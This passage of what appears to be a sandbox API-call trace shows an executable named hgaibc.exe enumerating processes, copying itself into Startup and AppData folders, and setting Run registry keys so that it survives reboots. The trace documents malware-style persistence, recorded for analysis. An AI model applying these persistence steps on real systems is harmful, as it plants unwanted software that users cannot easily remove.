th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0153.071] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0153.071] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="mobsync.exe")) returned 1 [0153.072] lstrlenW (lpString="mobsync.exe") returned 11 [0153.072] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x9d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0153.072] lstrlenW (lpString="hgaibc.exe") returned 10 [0153.072] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x9d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0153.073] lstrlenW (lpString="hgaibc.exe") returned 10 [0153.073] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x9d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 0 [0153.074] CloseHandle (hObject=0x240) returned 1 [0153.074] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b7790 | out: hHeap=0x6a0000) returned 1 [0153.074] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b79d0 | out: hHeap=0x6a0000) returned 1 [0153.074] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b66b0 | out: hHeap=0x6a0000) returned 1 [0153.074] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6610 | out: hHeap=0x6a0000) returned 1 [0153.074] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5670 | out: hHeap=0x6a0000) returned 1 [0153.074] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e34e0 | out: hHeap=0x6a0000) returned 1 [0153.074] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6670 | out: hHeap=0x6a0000) returned 1 [0153.074] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b65f0 | out: hHeap=0x6a0000) returned 1 [0153.074] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ddb38 | out: hHeap=0x6a0000) returned 1 [0153.074] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ddae8 | out: hHeap=0x6a0000) returned 1 [0153.074] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b67d0 | out: hHeap=0x6a0000) returned 1 [0153.074] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ddac0 | out: hHeap=0x6a0000) returned 1 [0153.074] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x6e6f70 [0153.075] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x6f6f78 [0153.075] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6e3480 [0153.075] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6e3480, Size=0x20) returned 0x6ddbb0 [0153.075] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6ddbb0, Size=0x40) returned 0x6b78b0 [0153.075] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6e34c8 [0153.075] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6e34c8, Size=0x20) returned 0x6ddc78 [0153.075] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6e3480 [0153.075] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6e3480, Size=0x20) returned 0x6dd908 [0153.075] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6e34e0 [0153.076] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6e34e0, Size=0x20) returned 0x6ddbb0 [0153.076] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6ddbb0, Size=0x40) returned 0x6b7430 [0153.076] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x6f6f78, nSize=0x7fff | out: lpFilename="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\hgaibc.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\hgaibc.exe")) returned 0x47 [0153.076] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x706f80 [0153.076] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x716f88 [0153.076] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6e3480 [0153.076] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6e3480, Size=0x20) returned 0x6ddc50 [0153.076] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6ddc50, Size=0x40) returned 0x6b7598 [0153.077] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6b7598, Size=0x80) returned 0x6e39c8 [0153.077] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6e39c8, Size=0x100) returned 0x6e39c8 [0153.077] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0153.077] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e39c8 | out: hHeap=0x6a0000) returned 1 [0153.077] ExpandEnvironmentStringsW (in: lpSrc="%windir%\\System32\\hgaibc.exe", lpDst=0x706f80, nSize=0x7fff | out: lpDst="C:\\WINDOWS\\System32\\hgaibc.exe") returned 0x1f [0153.077] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x716f88 | out: hHeap=0x6a0000) returned 1 [0153.077] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x706f80 | out: hHeap=0x6a0000) returned 1 [0153.078] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100000) returned 0x2437020 [0153.081] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6e3480 [0153.081] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6e3480, Size=0x20) returned 0x6ddb10 [0153.081] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6e3480 [0153.081] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6e3480, Size=0x20) returned 0x6ddcf0 [0153.081] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77050000 [0153.081] GetProcAddress (hModule=0x77050000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x77066b30 [0153.081] Wow64DisableWow64FsRedirection (in: OldValue=0x19fd94 | out: OldValue=0x19fd94*=0x0) returned 1 [0153.081] lstrlenW (lpString="kernel32.dll") returned 12 [0153.082] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ddb10 | out: hHeap=0x6a0000) returned 1 [0153.082] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0153.082] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ddcf0 | out: hHeap=0x6a0000) returned 1 [0153.082] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\hgaibc.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\hgaibc.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x240 [0153.082] CreateFileW (lpFileName="C:\\WINDOWS\\System32\\hgaibc.exe" (normalized: "c:\\windows\\system32\\hgaibc.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0153.083] CloseHandle (hObject=0x240) returned 1 [0153.083] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6e34c8 [0153.083] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6e34c8, Size=0x20) returned 0x6dd8b8 [0153.083] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6e3480 [0153.083] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6e3480, Size=0x20) returned 0x6ddbb0 [0153.083] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77050000 [0153.084] GetProcAddress (hModule=0x77050000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x77066b30 [0153.084] Wow64DisableWow64FsRedirection (in: OldValue=0x19fd94 | out: OldValue=0x19fd94*=0x1) returned 1 [0153.084] lstrlenW (lpString="kernel32.dll") returned 12 [0153.084] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ddbb0 | out: hHeap=0x6a0000) returned 1 [0153.084] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0153.084] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dd8b8 | out: hHeap=0x6a0000) returned 1 [0153.084] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2437020 | out: hHeap=0x6a0000) returned 1 [0153.087] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x706f80 [0153.087] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x716f88 [0153.087] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6e3480 [0153.087] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6e3480, Size=0x20) returned 0x6ddbb0 [0153.087] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6ddbb0, Size=0x40) returned 0x6b7700 [0153.087] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6b7700, Size=0x80) returned 0x6e39c8 [0153.088] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6e39c8, Size=0x100) returned 0x6e39c8 [0153.088] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0153.088] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e39c8 | out: hHeap=0x6a0000) returned 1 [0153.088] ExpandEnvironmentStringsW (in: lpSrc="%appdata%\\hgaibc.exe", lpDst=0x706f80, nSize=0x7fff | out: lpDst="C:\\Users\\FD1HVy\\AppData\\Roaming\\hgaibc.exe") returned 0x2b [0153.088] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x716f88 | out: hHeap=0x6a0000) returned 1 [0153.088] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x706f80 | out: hHeap=0x6a0000) returned 1 [0153.089] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100000) returned 0x2431020 [0153.092] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6e34c8 [0153.092] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6e34c8, Size=0x20) returned 0x6dd980 [0153.092] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6e34c8 [0153.092] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6e34c8, Size=0x20) returned 0x6dd8b8 [0153.092] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77050000 [0153.092] GetProcAddress (hModule=0x77050000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x77066b30 [0153.092] Wow64DisableWow64FsRedirection (in: OldValue=0x19fd94 | out: OldValue=0x19fd94*=0x1) returned 1 [0153.092] lstrlenW (lpString="kernel32.dll") returned 12 [0153.092] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dd980 | out: hHeap=0x6a0000) returned 1 [0153.092] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0153.093] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dd8b8 | out: hHeap=0x6a0000) returned 1 [0153.093] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\hgaibc.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\hgaibc.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x240 [0153.093] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\hgaibc.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\hgaibc.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x244 [0153.096] ReadFile (in: hFile=0x240, lpBuffer=0x2431020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x19fd90, lpOverlapped=0x0 | out: lpBuffer=0x2431020*, lpNumberOfBytesRead=0x19fd90*=0x17200, lpOverlapped=0x0) returned 1 [0153.137] WriteFile (in: hFile=0x244, lpBuffer=0x2431020*, nNumberOfBytesToWrite=0x17200, lpNumberOfBytesWritten=0x19fd90, lpOverlapped=0x0 | out: lpBuffer=0x2431020*, lpNumberOfBytesWritten=0x19fd90*=0x17200, lpOverlapped=0x0) returned 1 [0153.140] ReadFile (in: hFile=0x240, lpBuffer=0x2431020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x19fd90, lpOverlapped=0x0 | out: lpBuffer=0x2431020*, lpNumberOfBytesRead=0x19fd90*=0x0, lpOverlapped=0x0) returned 1 [0153.140] CloseHandle (hObject=0x244) returned 1 [0153.140] CloseHandle (hObject=0x240) returned 1 [0153.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6e3480 [0153.140] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6e3480, Size=0x20) returned 0x6ddbb0 [0153.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6e34c8 [0153.141] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6e34c8, Size=0x20) returned 0x6dd8e0 [0153.141] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77050000 [0153.141] GetProcAddress (hModule=0x77050000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x77066b30 [0153.141] Wow64DisableWow64FsRedirection (in: OldValue=0x19fd94 | out: OldValue=0x19fd94*=0x1) returned 1 [0153.141] lstrlenW (lpString="kernel32.dll") returned 12 [0153.141] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dd8e0 | out: hHeap=0x6a0000) returned 1 [0153.141] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0153.141] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ddbb0 | out: hHeap=0x6a0000) returned 1 [0153.141] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2431020 | out: hHeap=0x6a0000) returned 1 [0153.147] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6e34c8 [0153.147] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6e34c8, Size=0x20) returned 0x6dd8b8 [0153.147] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6dd8b8, Size=0x40) returned 0x6b76b8 [0153.147] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6b76b8, Size=0x80) returned 0x6e39c8 [0153.147] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\hgaibc.exe") returned 42 [0153.147] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0153.147] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x5c) returned 0x6e3078 [0153.147] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0x20106, phkResult=0x19fd64 | out: phkResult=0x19fd64*=0x240) returned 0x0 [0153.147] RegSetValueExW (hKey=0x240, lpValueName="hgaibc.exe", Reserved=0x0, dwType=0x1, lpData=0x6e6f70, cbData=0x54) returned 0x5 [0153.147] RegCloseKey (hKey=0x240) returned 0x0 [0153.148] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e3078 | out: hHeap=0x6a0000) returned 1 [0153.148] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\hgaibc.exe") returned 42 [0153.148] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0153.148] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x5c) returned 0x6e3078 [0153.148] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0x20106, phkResult=0x19fd64 | out: phkResult=0x19fd64*=0x244) returned 0x0 [0153.149] RegSetValueExW (in: hKey=0x244, lpValueName="hgaibc.exe", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\AppData\\Roaming\\hgaibc.exe", cbData=0x54 | out: lpData="C:\\Users\\FD1HVy\\AppData\\Roaming\\hgaibc.exe") returned 0x0 [0153.197] RegCloseKey (hKey=0x244) returned 0x0 [0153.197] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e3078 | out: hHeap=0x6a0000) returned 1 [0153.197] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0153.197] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e39c8 | out: hHeap=0x6a0000) returned 1 [0153.197] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x706f80 [0153.198] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x716f88 [0153.198] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6e3480 [0153.198] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6e3480, Size=0x20) returned 0x6ddb38 [0153.198] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6ddb38, Size=0x40) returned 0x6b78f8 [0153.198] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6b78f8, Size=0x80) returned 0x6e39c8 [0153.198] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6e39c8, Size=0x100) returned 0x6e39c8 [0153.198] lstrlenW (lpString="") returned 0 [0153.198] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0153.198] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8c) returned 0x6e3ad0 [0153.198] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x19fd10 | out: phkResult=0x19fd10*=0x244) returned 0x0 [0153.198] RegQueryValueExW (in: hKey=0x244, lpValueName="Startup", lpReserved=0x0, lpType=0x19fd1c, lpData=0x716f88, lpcbData=0x19fd48*=0x7fff | out: lpType=0x19fd1c*=0x0, lpData=0x716f88*=0x53, lpcbData=0x19fd48*=0x7fff) returned 0x2 [0153.198] RegCloseKey (hKey=0x244) returned 0x0 [0153.198] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e3ad0 | out: hHeap=0x6a0000) returned 1 [0153.198] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0153.198] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8c) returned 0x6e3ad0 [0153.198] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x19fd10 | out: phkResult=0x19fd10*=0x244) returned 0x0 [0153.198] RegQueryValueExW (in: hKey=0x244, lpValueName="Startup", lpReserved=0x0, lpType=0x19fd1c, lpData=0x716f88, lpcbData=0x19fd48*=0x7fff | out: lpType=0x19fd1c*=0x2, lpData="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpcbData=0x19fd48*=0x98) returned 0x0 [0153.198] RegCloseKey (hKey=0x244) returned 0x0 [0153.199] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e3ad0 | out: hHeap=0x6a0000) returned 1 [0153.199] lstrlenW (lpString="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 75 [0153.199] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0153.199] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e39c8 | out: hHeap=0x6a0000) returned 1 [0153.199] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\hgaibc.exe", lpDst=0x706f80, nSize=0x7fff | out: lpDst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\hgaibc.exe") returned 0x59 [0153.199] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x716f88 | out: hHeap=0x6a0000) returned 1 [0153.199] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x706f80 | out: hHeap=0x6a0000) returned 1 [0153.200] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100000) returned 0x2431020 [0153.203] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6e3480 [0153.203] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6e3480, Size=0x20) returned 0x6dd980 [0153.203] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6e34e0 [0153.203] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6e34e0, Size=0x20) returned 0x6ddc00 [0153.203] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77050000 [0153.203] GetProcAddress (hModule=0x77050000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x77066b30 [0153.203] Wow64DisableWow64FsRedirection (in: OldValue=0x19fd94 | out: OldValue=0x19fd94*=0x1) returned 1 [0153.203] lstrlenW (lpString="kernel32.dll") returned 12 [0153.203] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dd980 | out: hHeap=0x6a0000) returned 1 [0153.203] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0153.203] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ddc00 | out: hHeap=0x6a0000) returned 1 [0153.203] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\hgaibc.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\hgaibc.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x244 [0153.204] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\hgaibc.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\hgaibc.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0153.204] CloseHandle (hObject=0x244) returned 1 [0153.204] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6e3480 [0153.204] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6e3480, Size=0x20) returned 0x6ddb10 [0153.204] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6e3480 [0153.204] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6e3480, Size=0x20) returned 0x6dd980 [0153.204] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77050000 [0153.204] GetProcAddress (hModule=0x77050000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x77066b30 [0153.204] Wow64DisableWow64FsRedirection (in: OldValue=0x19fd94 | out: OldValue=0x19fd94*=0x1) returned 1 [0153.204] lstrlenW (lpString="kernel32.dll") returned 12 [0153.204] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dd980 | out: hHeap=0x6a0000) returned 1 [0153.204] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0153.204] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ddb10 | out: hHeap=0x6a0000) returned 1 [0153.205] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2431020 | out: hHeap=0x6a0000) returned 1 [0153.207] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x706f80 [0153.208] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x716f88 [0153.208] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6e3480 [0153.208] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6e3480, Size=0x20) returned 0x6dd980 [0153.208] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6dd980, Size=0x40) returned 0x6b7598 [0153.208] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6b7598, Size=0x80) returned 0x6e39c8 [0153.208] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6e39c8, Size=0x100) returned 0x6e39c8 [0153.208] lstrlenW (lpString="") returned 0 [0153.208] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0153.208] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8c) returned 0x6e3ad0 [0153.208] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x19fd10 | out: phkResult=0x19fd10*=0x244) returned 0x0 [0153.208] RegQueryValueExW (in: hKey=0x244, lpValueName="Common Startup", lpReserved=0x0, lpType=0x19fd1c, lpData=0x716f88, lpcbData=0x19fd48*=0x7fff | out: lpType=0x19fd1c*=0x2, lpData="%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpcbData=0x19fd48*=0x78) returned 0x0 [0153.208] RegCloseKey (hKey=0x244) returned 0x0 [0153.208] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e3ad0 | out: hHeap=0x6a0000) returned 1 [0153.208] lstrlenW (lpString="%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 59 [0153.208] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0153.208] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e39c8 | out: hHeap=0x6a0000) returned 1 [0153.209] ExpandEnvironmentStringsW (in: lpSrc="%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\hgaibc.exe", lpDst=0x706f80, nSize=0x7fff | out: lpDst="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\hgaibc.exe") returned 0x48 [0153.209] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x716f88 | out: hHeap=0x6a0000) returned 1 [0153.209] HeapFree (in: 